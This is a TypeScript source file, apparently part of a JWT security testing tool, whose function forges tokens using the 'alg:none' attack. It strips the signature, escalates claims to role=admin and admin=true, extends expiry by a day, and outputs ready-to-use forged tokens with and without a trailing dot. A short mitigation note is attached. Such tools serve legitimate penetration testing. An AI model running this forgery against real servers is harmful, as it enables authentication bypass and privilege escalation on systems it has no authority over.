import { AlgNoneResult, DecodedJwt } from "../types/jwt";
import { base64urlEncode } from "./decoder";

export function runAlgNoneAttack(decoded: DecodedJwt): AlgNoneResult {
  const originalAlg = decoded.header.alg;
  const now = Math.floor(Date.now() / 1000);

  const forgedHeader = { ...decoded.header, alg: "none" };
  const forgedPayload = {
    ...decoded.payload,
    sub: decoded.payload.sub || "admin",
    role: "admin",
    admin: true,
    exp: now + 86400,
  };

  const encodedHeader = base64urlEncode(JSON.stringify(forgedHeader));
  const encodedPayload = base64urlEncode(JSON.stringify(forgedPayload));
  const forgedWithDot = `${encodedHeader}.${encodedPayload}.`;
  const forgedWithoutDot = `${encodedHeader}.${encodedPayload}`;

  const lowered = originalAlg.toLowerCase();
  const status = lowered === "none" || lowered.startsWith("hs") ? "VULNERABLE" : "UNKNOWN";

  const explanation =
    status === "VULNERABLE"
      ? "A forged token was generated by downgrading the algorithm to 'none' and removing the signature. Vulnerable JWT validators may still accept this token."
      : "Asymmetric algorithms can still be impacted by alg:none parsing flaws in some implementations, but exploitability cannot be confirmed without target-server validation behavior.";

  return {
    status,
    forgedToken: `${forgedWithDot}\n${forgedWithoutDot}`,
    originalAlg,
    explanation,
    mitigation:
      "Enforce an explicit algorithm allowlist server-side and reject tokens declaring 'alg:none'. Always require signature verification.",
    steps: [
      `1. Decoded original JWT header: ${JSON.stringify(decoded.header)}`,
      "2. Modified header: set alg to 'none'",
      "3. Escalated payload claims: role=admin and admin=true",
      "4. Extended token expiry by 24 hours",
      "5. Re-encoded token with empty signature segment",
      "6. Generated a no-trailing-dot variant for permissive parsers",
      "7. Forged token(s) ready — secure servers must reject both variants",
    ],
  };
}
